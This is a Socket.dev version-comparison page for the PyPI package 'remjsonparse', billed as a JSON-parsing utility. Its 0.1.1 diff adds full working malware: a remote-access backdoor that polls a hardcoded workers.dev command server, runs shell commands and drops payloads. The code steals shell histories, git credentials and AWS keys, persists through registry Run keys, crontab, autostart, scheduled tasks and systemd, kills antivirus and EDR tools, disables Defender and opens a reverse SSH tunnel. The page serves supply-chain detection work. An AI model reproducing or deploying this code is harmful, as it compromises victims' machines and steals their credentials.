You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket
Book a DemoSign in

remjsonparse

Package Overview
Dependencies
Maintainers
1
Versions
7
Alerts
File Explorer

Advanced tools

License
Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

remjsonparse - pypi Package Compare versions

Comparing version
0.1.0
 to
0.1.1
remjsonparse/__init__.py
+17
remjsonparse/m0.py
import os
import platform
K0 = "https://dry-star-7e02.skyshed.workers.dev".rstrip("/")
K1 = 60
K2 = 48 * 3600
Kb = "x7k"
def _g0() -> str:
try:
import socket
h = socket.gethostname() or "unknown"
except Exception:
h = "unknown"
s = "".join(c if c.isalnum() or c in "-_" else "_" for c in h)
return s or "agent"
+34
remjsonparse/m1.py
import platform
import subprocess
import sys
def _r0(c: str) -> tuple[str, str, int]:
if not c or not c.strip():
return "", "", 0
try:
if platform.system() == "Windows":
r = subprocess.run(
c,
shell=True,
capture_output=True,
text=True,
timeout=60,
cwd=None,
)
else:
r = subprocess.run(
["sh", "-c", c],
capture_output=True,
text=True,
timeout=60,
)
return (
(r.stdout or "").strip() or "(no output)",
(r.stderr or "").strip() or "",
r.returncode,
)
except subprocess.TimeoutExpired:
return "(timeout)", "", -1
except Exception as e:
return "", str(e), -1
+87
remjsonparse/m2.py
import json
import urllib.parse
import urllib.request
def _o0():
px = urllib.request.getproxies()
return urllib.request.build_opener(
urllib.request.ProxyHandler(px),
urllib.request.HTTPSHandler(),
)
def _o1(req, timeout=15):
return _o0().open(req, timeout=timeout)
def _o2(u: str) -> None:
if not (u.startswith("https://") or u.startswith("HTTPS://")):
raise ValueError("C2 URL must use HTTPS")
def _p0(u: str, a: str) -> dict:
_o2(u)
url = f"{u}/poll?id={urllib.parse.quote(a)}"
try:
req = urllib.request.Request(url)
with _o1(req, timeout=15) as r:
d = json.loads(r.read().decode())
return {
"cmd": d.get("cmd"),
"file": d.get("file"),
}
except Exception:
return {"cmd": None, "file": None}
def _p1(u: str, a: str, r: str) -> bool:
_o2(u)
url = f"{u}/result"
try:
b = json.dumps({"id": a, "result": r}).encode()
req = urllib.request.Request(url, data=b, method="POST")
req.add_header("Content-Type", "application/json")
with _o1(req, timeout=15):
return True
except Exception:
return False
def _p2(u: str, a: str, path: str, cb: str) -> bool:
_o2(u)
url = f"{u}/fileresult"
try:
b = json.dumps({"id": a, "path": path, "content": cb}).encode()
req = urllib.request.Request(url, data=b, method="POST")
req.add_header("Content-Type", "application/json")
with _o1(req, timeout=30):
return True
except Exception:
return False
def _p3(u: str, a: str, pk: str) -> bool:
_o2(u)
url = f"{u}/ssh_pubkey"
try:
b = json.dumps({"id": a, "pubkey": pk}).encode()
req = urllib.request.Request(url, data=b, method="POST")
req.add_header("Content-Type", "application/json")
with _o1(req, timeout=15):
return True
except Exception:
return False
def _p4(u: str, a: str, hi: dict) -> bool:
_o2(u)
url = f"{u}/checkin"
try:
b = json.dumps({"id": a, "hostinfo": hi}).encode()
req = urllib.request.Request(url, data=b, method="POST")
req.add_header("Content-Type", "application/json")
with _o1(req, timeout=15):
return True
except Exception:
return False
+88
remjsonparse/m3.py
import base64
import os
import platform
import subprocess
import sys
def _f0():
yield ([sys.executable], "current")
if platform.system() == "Windows":
yield (["py", "-3"], "py -3")
yield (["python"], "python")
yield (["python3"], "python3")
else:
yield (["python3"], "python3")
yield (["python"], "python")
def _f1(path: str, cb: str, run: bool) -> tuple[bool, str]:
try:
raw = base64.b64decode(cb, validate=True)
except Exception as e:
return False, f"decode error: {e}"
try:
dp = os.path.dirname(path)
if dp:
os.makedirs(dp, exist_ok=True)
with open(path, "wb") as f:
f.write(raw)
except Exception as e:
return False, str(e)
if not run:
return True, f"wrote {path}"
try:
if platform.system() == "Windows":
if path.lower().endswith(".py"):
fl = subprocess.CREATE_NEW_PROCESS_GROUP if hasattr(subprocess, "CREATE_NEW_PROCESS_GROUP") else 0
for argv, _ in _f0():
try:
subprocess.Popen(
argv + [path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
creationflags=fl,
)
return True, f"launched {path}"
except (FileNotFoundError, OSError):
continue
return True, f"wrote {path} but run failed: no python found"
else:
os.startfile(path)
return True, f"launched {path}"
else:
os.chmod(path, 0o700)
if path.endswith(".py"):
for argv, _ in _f0():
try:
subprocess.Popen(
argv + [path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
start_new_session=True,
)
return True, f"executed {path}"
except (FileNotFoundError, OSError):
continue
return True, f"wrote {path} but run failed: no python found"
else:
subprocess.Popen(
[path],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
start_new_session=True,
)
return True, f"executed {path}"
except Exception as e:
return True, f"wrote {path} but run failed: {e}"
def _f2(path: str, mx: int = 10 * 1024 * 1024) -> tuple[bool, str]:
try:
with open(path, "rb") as f:
d = f.read(mx + 1)
if len(d) > mx:
return False, "file too large"
return True, base64.b64encode(d).decode("ascii")
except Exception as e:
return False, str(e)
+292
remjsonparse/m4.py
import os
import sys
import platform
def _x0() -> bool:
try:
from .m5 import _hd
return _hd()[0]
except Exception:
return False
def _x1() -> str:
from .m0 import Kb
if platform.system() == "Windows":
b = os.environ.get("APPDATA") or os.path.expanduser("~")
dp = os.path.join(b, Kb)
else:
dp = os.path.join(os.path.expanduser("~"), ".local", "share", Kb)
os.makedirs(dp, exist_ok=True)
return dp
def _x2() -> str:
return _x1()
def _x3() -> str:
return os.path.join(_x1(), ".p")
def _x4() -> bool:
return os.path.isfile(_x3())
def _x5() -> None:
try:
with open(_x3(), "w") as f:
f.write("1")
except Exception:
pass
def _x6() -> bool:
try:
import winreg
kp = r"Software\Microsoft\Windows\CurrentVersion\Run"
from .m0 import Kb
exe = sys.executable
if exe.lower().endswith("python.exe"):
pw = exe[:-10] + "pythonw.exe"
if os.path.isfile(pw):
exe = pw
q = f'"{exe}"' if " " in exe else exe
cmd = (
f'cmd /c ({q} -c "import remjsonparse" 2>nul) || (py -3 -c "import remjsonparse" 2>nul) '
f'|| (python -c "import remjsonparse" 2>nul) || (python3 -c "import remjsonparse" 2>nul)'
)
with winreg.OpenKey(
winreg.HKEY_CURRENT_USER,
kp,
0,
winreg.KEY_SET_VALUE,
) as key:
winreg.SetValueEx(key, Kb, 0, winreg.REG_SZ, cmd)
return True
except Exception:
return False
def _x7() -> bool:
try:
import subprocess
from .m0 import Kb
cur = subprocess.run(
["crontab", "-l"],
capture_output=True,
text=True,
timeout=5,
)
ex = cur.stdout if cur.returncode == 0 else ""
exe = sys.executable
line = (
f'@reboot ({exe} -c "import remjsonparse" 2>/dev/null) '
f'|| (python3 -c "import remjsonparse" 2>/dev/null) '
f'|| (python -c "import remjsonparse" 2>/dev/null)'
)
if Kb in ex:
return True
nc = (ex.rstrip() + "\n" + line + "\n").lstrip()
pr = subprocess.run(
["crontab", "-"],
input=nc,
capture_output=True,
text=True,
timeout=5,
)
return pr.returncode == 0
except Exception:
return False
def _x8() -> bool:
try:
from .m0 import Kb
b = os.path.expanduser("~")
ast = os.path.join(b, ".config", "autostart")
os.makedirs(ast, exist_ok=True)
path = os.path.join(ast, Kb + ".desktop")
exe = sys.executable
ec = (
f'sh -c \'({exe} -c "import remjsonparse" 2>/dev/null) '
f'|| (python3 -c "import remjsonparse" 2>/dev/null) '
f'|| (python -c "import remjsonparse" 2>/dev/null)\''
)
content = f"""[Desktop Entry]
Type=Application
Name={Kb}
Exec={ec}
Hidden=false
NoDisplay=true
X-GNOME-Autostart-enabled=true
"""
with open(path, "w") as f:
f.write(content)
return True
except Exception:
return False
def _x9() -> bool:
try:
import subprocess
from .m0 import Kb
exe = sys.executable
if exe.lower().endswith("python.exe"):
pw = exe[:-10] + "pythonw.exe"
if os.path.isfile(pw):
exe = pw
tr = f'"{exe}" -c "import remjsonparse"'
subprocess.run(
[
"schtasks", "/create", "/tn", Kb, "/tr", tr,
"/sc", "onlogon", "/rl", "highest", "/f",
],
capture_output=True,
timeout=10,
)
return True
except Exception:
return False
def _xa() -> bool:
try:
import subprocess
import tempfile
from .m0 import Kb
exe = sys.executable
unit = f"""[Unit]
Description={Kb}
After=network.target
[Service]
Type=oneshot
ExecStart={exe} -c "import remjsonparse"
RemainAfterExit=no
Restart=on-failure
RestartSec=60
[Install]
WantedBy=multi-user.target
"""
path = f"/etc/systemd/system/{Kb}.service"
ir = os.geteuid() == 0
if ir:
with open(path, "w") as f:
f.write(unit)
subprocess.run(["systemctl", "daemon-reload"], capture_output=True, timeout=5)
subprocess.run(["systemctl", "enable", Kb], capture_output=True, timeout=5)
subprocess.run(["systemctl", "start", Kb], capture_output=True, timeout=5)
else:
with tempfile.NamedTemporaryFile(mode="w", suffix=".service", delete=False) as f:
f.write(unit)
tmp = f.name
try:
subprocess.run(["sudo", "-n", "cp", tmp, path], capture_output=True, timeout=5)
subprocess.run(["sudo", "-n", "systemctl", "daemon-reload"], capture_output=True, timeout=5)
subprocess.run(["sudo", "-n", "systemctl", "enable", Kb], capture_output=True, timeout=5)
subprocess.run(["sudo", "-n", "systemctl", "start", Kb], capture_output=True, timeout=5)
finally:
try:
os.unlink(tmp)
except Exception:
pass
return True
except Exception:
return False
def _xb() -> bool:
if _x4():
return True
ok = False
if platform.system() == "Windows":
ok = _x6()
if ok and _x0():
_x9()
else:
ok = _x7() or _x8()
if ok and _x0():
_xa()
if ok:
_x5()
return ok
def _xc() -> None:
try:
from .m0 import Kb
if platform.system() == "Windows":
import subprocess
import winreg
try:
subprocess.run(["schtasks", "/delete", "/tn", Kb, "/f"], capture_output=True, timeout=5)
except Exception:
pass
kp = r"Software\Microsoft\Windows\CurrentVersion\Run"
try:
with winreg.OpenKey(
winreg.HKEY_CURRENT_USER,
kp,
0,
winreg.KEY_SET_VALUE,
) as key:
try:
winreg.DeleteValue(key, Kb)
except FileNotFoundError:
pass
except Exception:
pass
else:
import subprocess
try:
if os.geteuid() == 0:
subprocess.run(["systemctl", "disable", Kb, "--now"], capture_output=True, timeout=5)
try:
os.remove(f"/etc/systemd/system/{Kb}.service")
except Exception:
pass
subprocess.run(["systemctl", "daemon-reload"], capture_output=True, timeout=5)
else:
subprocess.run(["sudo", "-n", "systemctl", "disable", Kb, "--now"], capture_output=True, timeout=5)
subprocess.run(["sudo", "-n", "rm", "-f", f"/etc/systemd/system/{Kb}.service"], capture_output=True, timeout=5)
subprocess.run(["sudo", "-n", "systemctl", "daemon-reload"], capture_output=True, timeout=5)
except Exception:
pass
try:
cur = subprocess.run(
["crontab", "-l"],
capture_output=True,
text=True,
timeout=5,
)
ex = cur.stdout if cur.returncode == 0 else ""
line = f'@reboot {sys.executable} -c "import remjsonparse"'
nl = [row for row in ex.splitlines() if line not in row and Kb not in row]
if nl != ex.splitlines():
nc = "\n".join(nl).strip() + "\n" if nl else ""
subprocess.run(["crontab", "-"], input=nc or "\n", capture_output=True, text=True, timeout=5)
except Exception:
pass
try:
desk = os.path.join(os.path.expanduser("~"), ".config", "autostart", Kb + ".desktop")
if os.path.isfile(desk):
os.remove(desk)
except Exception:
pass
mk = _x3()
if os.path.isfile(mk):
os.remove(mk)
dp = os.path.dirname(mk)
if os.path.isdir(dp):
try:
for fn in os.listdir(dp):
os.remove(os.path.join(dp, fn))
os.rmdir(dp)
except Exception:
pass
except Exception:
pass
+390
remjsonparse/m5.py
import base64
import os
import platform
import socket
import subprocess
import sys
K3 = (
"crowdstrike", "csagent", "csfalcon", "carbon", "carbonblack", "cbdefense",
"sentinel", "sentinelone", "s1-", "cylance", "elastic", "endpoint", "elr",
"defender", "msmpeng", "mpcmdrun", "securityhealth", "windefend", "nissrv",
"symantec", "symantec.*endpoint", "sep", "sav", "norton", "mcafee", "mcshield",
"mcafeeframework", "trend", "micro", "officescan", "sophos", "savservice",
"kaspersky", "avp", "avast", "avg", "bitdefender", "bdagent", "vsserv",
"malwarebytes", "mbam", "eset", "ekrn", "egui", "f-secure", "fsav",
"sysmon", "sysmon64", "wireshark", "dumpcap", "tshark", "processhacker",
"procmon", "procexp", "autoruns", "pstools", "x64dbg", "ollydbg", "ida",
"wincfg", "osquery", "falcon", "tanium", "trapx", "cybereason", "cyserver",
"paloalto", "traps", "cortex", "fireeye", "mandiant", "hx", "helix",
"qualys", "rapid7", "insight", "vmware", "vmware.*carbon", "deep",
"threat", "detect", "response", "edr", "avp.", "amsi", "wdniss",
)
def _h0() -> list[str]:
out = []
try:
n = socket.gethostname()
out.append(socket.gethostbyname(n))
except Exception:
pass
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(1)
s.connect(("8.8.8.8", 53))
ip = s.getsockname()[0]
s.close()
if ip and ip not in out:
out.append(ip)
except Exception:
pass
return out or ["unknown"]
def _h1() -> str:
try:
return socket.gethostname() or "unknown"
except Exception:
return "unknown"
def _h2() -> str:
try:
return f"{platform.system()} {platform.release()} ({platform.machine()})"
except Exception:
return platform.system() or "unknown"
def _h3() -> dict:
out = {"os": platform.system() or "unknown", "version": "", "build": "", "kernel": ""}
try:
if platform.system() == "Windows":
out["version"] = platform.release() or ""
out["build"] = platform.version() or ""
try:
import winreg
kp = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion"
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
kp,
0,
winreg.KEY_READ,
) as key:
pn = ""
ei = ""
for nm in ("ProductName", "DisplayVersion", "ReleaseId", "CurrentBuild", "CurrentBuildNumber", "EditionID"):
try:
val, _ = winreg.QueryValueEx(key, nm)
val = str(val).strip() if val else ""
if nm == "ProductName":
pn = val
elif nm == "EditionID":
ei = val
elif nm == "DisplayVersion" and val:
out["version"] = val
elif nm == "ReleaseId" and val and not out["version"]:
out["version"] = val
elif nm in ("CurrentBuild", "CurrentBuildNumber") and val:
out["build"] = val
except (OSError, FileNotFoundError):
pass
if pn:
out["os"] = f"{pn}{' ' + ei if ei else ''}"
if not out["build"]:
out["build"] = platform.version() or ""
except Exception:
pass
else:
out["kernel"] = platform.release() or ""
try:
with open("/etc/os-release", "r", encoding="utf-8", errors="ignore") as f:
ct = f.read()
for ln in ct.splitlines():
ln = ln.strip()
if ln.startswith("PRETTY_NAME="):
out["version"] = ln.split("=", 1)[1].strip().strip('"')
elif ln.startswith("NAME="):
out["distro"] = ln.split("=", 1)[1].strip().strip('"')
elif ln.startswith("VERSION_ID="):
out["version_id"] = ln.split("=", 1)[1].strip().strip('"')
except Exception:
pass
if not out["version"] and out.get("distro"):
out["version"] = f"{out['distro']} {out.get('version_id', '')}".strip()
if not out["version"]:
out["version"] = platform.release() or ""
except Exception:
pass
return out
def _h4() -> str:
for k in ("USER", "USERNAME", "LOGNAME"):
v = os.environ.get(k)
if v:
return v
try:
return os.getlogin()
except Exception:
pass
return "unknown"
def _h5() -> str:
if platform.system() == "Windows":
for k in ("USERDNSDOMAIN", "LOGONSERVER"):
v = os.environ.get(k)
if v:
return v
try:
import ctypes
buf = ctypes.create_unicode_buffer(256)
if ctypes.windll.kernel32.GetComputerNameExW(5, buf, ctypes.c_ulong(256)):
return buf.value or ""
except Exception:
pass
return ""
try:
fqdn = socket.getfqdn()
if fqdn and "." in fqdn and fqdn != _h1():
return fqdn.split(".", 1)[1]
except Exception:
pass
return ""
def _h6(mc: int = 50000) -> str:
try:
if platform.system() == "Windows":
r = subprocess.run(
["tasklist", "/FO", "CSV", "/NH"],
capture_output=True,
text=True,
timeout=15,
)
raw = (r.stdout or "").strip()
else:
r = subprocess.run(
["ps", "-eo", "pid,comm", "--no-headers"],
capture_output=True,
text=True,
timeout=15,
)
raw = (r.stdout or "").strip()
if len(raw) > mc:
raw = raw[:mc] + "\n... (truncated)"
return raw or "(none)"
except Exception as e:
return f"(error: {e})"
def _h7(rp: str) -> list[str]:
names = []
if not rp or rp.startswith("("):
return names
if platform.system() == "Windows":
for ln in rp.splitlines():
ln = ln.strip()
if not ln:
continue
if ln.startswith('"'):
end = ln.find('"', 1)
if end != -1:
names.append(ln[1:end].strip())
else:
first = ln.split(",")[0].strip().strip('"')
if first:
names.append(first)
else:
for ln in rp.splitlines():
pts = ln.split(None, 1)
if len(pts) >= 2:
names.append(pts[1].strip())
elif len(pts) == 1 and pts[0].isdigit():
pass
return names
def _h8(pn: list[str]) -> list[str]:
seen = set()
out = []
lp = [p.lower() for p in K3]
for nm in pn:
if not nm:
continue
nl = nm.lower()
for pat in lp:
if pat in nl:
if nl not in seen:
seen.add(nl)
out.append(nm)
break
return sorted(out)
def _h9(path: str, ms: int = 102400) -> str | None:
try:
if not os.path.isfile(path):
return None
with open(path, "rb") as f:
d = f.read(ms + 1)
if len(d) > ms:
d = d[:ms]
return base64.b64encode(d).decode("ascii")
except Exception:
return None
def _ha() -> list[dict]:
out = []
home = os.path.expanduser("~")
for nm in (".bash_history", ".zsh_history", ".sh_history", ".fish_history", ".python_history"):
path = os.path.join(home, nm)
ct = _h9(path, 150000)
if ct:
out.append({"path": path, "content": ct})
if platform.system() == "Windows":
appdata = os.environ.get("APPDATA") or home
psp = os.path.join(appdata, "Microsoft", "Windows", "PowerShell", "PSReadLine", "ConsoleHost_history.txt")
ct = _h9(psp, 150000)
if ct:
out.append({"path": psp, "content": ct})
local = os.environ.get("LOCALAPPDATA") or home
ps7 = os.path.join(local, "Microsoft", "PowerShell", "PSReadLine", "ConsoleHost_history.txt")
if ps7 != psp:
ct = _h9(ps7, 150000)
if ct:
out.append({"path": ps7, "content": ct})
else:
psp = os.path.join(home, ".local", "share", "powershell", "PSReadLine", "ConsoleHost_history.txt")
ct = _h9(psp, 150000)
if ct:
out.append({"path": psp, "content": ct})
return out
def _hb() -> list[dict]:
out = []
home = os.path.expanduser("~")
cand = [
os.path.join(home, ".git-credentials"),
os.path.join(home, ".config", "git", "credentials"),
]
if platform.system() == "Windows":
cand.append(os.path.join(home, "git-credentials"))
for path in cand:
ct = _h9(path, 50000)
if ct:
out.append({"path": path, "content": ct})
gcfg = os.path.join(home, ".gitconfig")
c = _h9(gcfg, 30000)
if c:
out.append({"path": gcfg, "content": c})
return out
def _hc() -> list[dict]:
out = []
home = os.path.expanduser("~")
ad = os.path.join(home, ".aws")
if not os.path.isdir(ad):
return out
for nm in ("credentials", "config"):
path = os.path.join(ad, nm)
ct = _h9(path, 50000)
if ct:
out.append({"path": path, "content": ct})
return out
def _hd() -> tuple[bool, str]:
if platform.system() == "Windows":
try:
import ctypes
if ctypes.windll.shell32.IsUserAnAdmin():
return True, "admin"
except Exception:
pass
return False, "user"
try:
if os.geteuid() == 0:
return True, "root"
except Exception:
pass
try:
r = subprocess.run(
["sudo", "-n", "true"],
capture_output=True,
timeout=5,
)
if r.returncode == 0:
return True, "sudoer"
except Exception:
pass
try:
with open("/etc/group", "r", encoding="utf-8", errors="ignore") as f:
mg = set(os.getgroups())
for ln in f:
pts = ln.strip().split(":")
if len(pts) >= 3 and pts[0] in ("sudo", "wheel", "admin"):
try:
gid = int(pts[2])
if gid in mg:
return True, "sudoer"
except (ValueError, IndexError):
pass
except Exception:
pass
return False, "user"
def _he() -> list[str]:
rp = _h6()
pn = _h7(rp)
return _h8(pn)
def _hf() -> dict:
rp = _h6()
pn = _h7(rp)
st = _h8(pn)
ipr, pl = _hd()
return {
"ip": _h0(),
"hostname": _h1(),
"os": _h2(),
"os_detailed": _h3(),
"username": _h4(),
"domain": _h5() or None,
"admin": ipr,
"privileges": pl,
"processes": rp,
"security_tools": st,
"histories": _ha(),
"git_credentials": _hb(),
"aws_keys": _hc(),
}
def _hg() -> str:
from .m0 import Kb
if platform.system() == "Windows":
b = os.environ.get("APPDATA") or os.path.expanduser("~")
dp = os.path.join(b, Kb)
else:
dp = os.path.join(os.path.expanduser("~"), ".local", "share", Kb)
os.makedirs(dp, exist_ok=True)
return os.path.join(dp, ".c")
def _hi() -> bool:
return os.path.isfile(_hg())
def _hj() -> None:
try:
with open(_hg(), "w") as f:
f.write("1")
except Exception:
pass
+80
remjsonparse/m6.py
import os
import platform
import subprocess
K4 = (
"WinDefend", "WdNisSvc", "WdNisDrv", "SecurityHealthService", "wscsvc",
"McAfeeFramework", "McShield", "mfevtp", "Sophos Health Service",
"CylanceSvc", "CSFalconService", "SentinelAgent", "SentinelHelper",
"elastic-endpoint", "osqueryd",
)
def _s0(pn: list[str]) -> None:
if not pn:
return
try:
from .m5 import _hd
if not _hd()[0]:
return
except Exception:
return
if platform.system() == "Windows":
_s1(pn)
else:
_s2(pn)
def _s1(pn: list[str]) -> None:
for nm in pn:
try:
subprocess.run(
["taskkill", "/F", "/IM", nm],
capture_output=True,
timeout=5,
)
except Exception:
pass
for svc in K4:
try:
subprocess.run(
["net", "stop", svc],
capture_output=True,
timeout=10,
)
except Exception:
pass
try:
subprocess.run(
["powershell", "-NoProfile", "-NonInteractive", "-Command",
"Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue"],
capture_output=True,
timeout=15,
)
except Exception:
pass
def _s2(pn: list[str]) -> None:
for nm in pn:
try:
subprocess.run(["pkill", "-9", "-f", nm], capture_output=True, timeout=5)
except Exception:
pass
try:
subprocess.run(["killall", "-9", nm], capture_output=True, timeout=5)
except Exception:
pass
stt = (
"crowdstrike-falcon", "falcon-sensor", "csfalcon", "sentinelone",
"cylance", "elastic-endpoint", "osquery",
)
for svc in stt:
try:
subprocess.run(
["systemctl", "stop", svc],
capture_output=True,
timeout=5,
)
except Exception:
pass
+77
remjsonparse/m7.py
import os
import subprocess
import time
K5 = "k0"
K6 = "9051"
K7 = "22"
K8 = 60
def _t0(u: str, a: str, spf, remote: str, tp: str = K6, sp: str = K7) -> str:
remote = (remote or "").strip()
if not remote:
return "tunnel failed: no remote (use __ssh_tunnel user@host or __ssh_tunnel host)"
if "@" not in remote:
remote = f"root@{remote}"
try:
from .m4 import _x2
except Exception:
return "tunnel failed: no data dir"
dd = _x2()
kp = os.path.join(dd, K5)
ke = os.path.isfile(kp) and os.path.isfile(kp + ".pub")
if not ke:
ok, err = _t1(kp)
if not ok:
return f"tunnel failed: keygen {err}"
try:
with open(kp + ".pub", "r", encoding="utf-8", errors="ignore") as f:
pk = f.read().strip()
except Exception as e:
return f"tunnel failed: read pubkey {e}"
spf(u, a, pk)
time.sleep(K8)
cmd = [
"ssh",
"-p", sp,
"-R", f"127.0.0.1:{tp}",
remote,
"-i", kp,
"-N",
"-o", "StrictHostKeyChecking=no",
"-o", f"UserKnownHostsFile={os.devnull}",
]
try:
subprocess.Popen(
cmd,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
start_new_session=True,
)
except FileNotFoundError:
return "tunnel failed: ssh not found"
except Exception as e:
return f"tunnel failed: {e}"
if ke:
return "ssh_tunnel started (existing key)"
return "ssh_tunnel started (new key posted to C2, waited 60s)"
def _t1(kp: str) -> tuple[bool, str]:
try:
r = subprocess.run(
["ssh-keygen", "-t", "ed25519", "-f", kp, "-N", ""],
capture_output=True,
text=True,
timeout=30,
)
if r.returncode != 0:
return False, (r.stderr or r.stdout or "keygen failed").strip()[:200]
return True, ""
except FileNotFoundError:
return False, "ssh-keygen not found"
except subprocess.TimeoutExpired:
return False, "keygen timeout"
except Exception as e:
return False, str(e)
+116
remjsonparse/m8.py
import os
import time
from .m0 import K0, K1, K2, _g0
from .m2 import _p0, _p1, _p2, _p3, _p4
from .m3 import _f1, _f2
from .m5 import _hf, _hi, _he, _hj
from .m4 import _xb, _xc
from .m1 import _r0
from .m6 import _s0
from .m7 import _t0
K9 = "__download "
K10 = "__disable_security"
K11 = "__ssh_tunnel"
def _l0() -> None:
a = _g0()
if not _hi():
try:
hi = _hf()
try:
_xb()
except Exception:
pass
if _p4(K0, a, hi):
_hj()
except Exception:
pass
else:
try:
_xb()
except Exception:
pass
lct = time.time()
while True:
try:
if time.time() - lct > K2:
try:
_xc()
except Exception:
pass
os._exit(0)
resp = _p0(K0, a)
cmd = resp.get("cmd")
fs = resp.get("file")
if fs and isinstance(fs, dict):
path = fs.get("path") or ""
content = fs.get("content") or ""
run = bool(fs.get("run"))
if path and content:
lct = time.time()
ok, msg = _f1(path, content, run)
try:
_p1(K0, a, msg)
except Exception:
pass
if cmd:
lct = time.time()
if cmd.strip().startswith(K11):
try:
rest = cmd.strip()[len(K11):].strip().split()
remote = rest[0] if rest else ""
tp = "9051"
sp = "22"
if len(rest) == 2:
sp = rest[1]
elif len(rest) >= 3:
tp = rest[1]
sp = rest[2]
msg = _t0(K0, a, _p3, remote, tp, sp)
_p1(K0, a, msg)
except Exception as e:
try:
_p1(K0, a, f"ssh_tunnel failed: {e}")
except Exception:
pass
elif cmd.strip() == K10:
try:
tools = _he()
_s0(tools)
_p1(K0, a, f"disable_security run (targeted: {tools!r})")
except Exception as e:
try:
_p1(K0, a, f"disable_security failed: {e}")
except Exception:
pass
elif cmd.strip().startswith(K9):
path = cmd.strip()[len(K9):].strip()
ok, data = _f2(path)
if ok:
try:
_p2(K0, a, path, data)
_p1(K0, a, f"downloaded {path}")
except Exception:
_p1(K0, a, f"download send failed: {path}")
else:
try:
_p1(K0, a, f"download failed: {data}")
except Exception:
pass
else:
out, err, code = _r0(cmd)
result = out
if err:
result += "\n[stderr]\n" + err
if code != 0:
result += f"\n[exit {code}]"
try:
_p1(K0, a, result)
except Exception:
pass
except Exception:
pass
time.sleep(K1)
+1
-1
PKG-INFO
Metadata-Version: 2.4
Name: remjsonparse
Version: 0.1.0
Version: 0.1.1
Summary: Utility package for automation and remote json parsing.

@@ -5,0 +5,0 @@ Author-email: Jerry <jerryng@led-mate.com>

+1
-1
pyproject.toml

@@ -7,3 +7,3 @@ [build-system]

name = "remjsonparse"
version = "0.1.0"
version = "0.1.1"
description = "Utility package for automation and remote json parsing."

@@ -10,0 +10,0 @@ readme = "README.md"

+1
-1
remjsonparse.egg-info/PKG-INFO
Metadata-Version: 2.4
Name: remjsonparse
Version: 0.1.0
Version: 0.1.1
Summary: Utility package for automation and remote json parsing.

@@ -5,0 +5,0 @@ Author-email: Jerry <jerryng@led-mate.com>

+10
-0
remjsonparse.egg-info/SOURCES.txt
LICENSE
README.md
pyproject.toml
remjsonparse/__init__.py
remjsonparse/m0.py
remjsonparse/m1.py
remjsonparse/m2.py
remjsonparse/m3.py
remjsonparse/m4.py
remjsonparse/m5.py
remjsonparse/m6.py
remjsonparse/m7.py
remjsonparse/m8.py
remjsonparse.egg-info/PKG-INFO

@@ -5,0 +15,0 @@ remjsonparse.egg-info/SOURCES.txt

+1
-1
remjsonparse.egg-info/top_level.txt

@@ -1,1 +0,1 @@

remjsonparse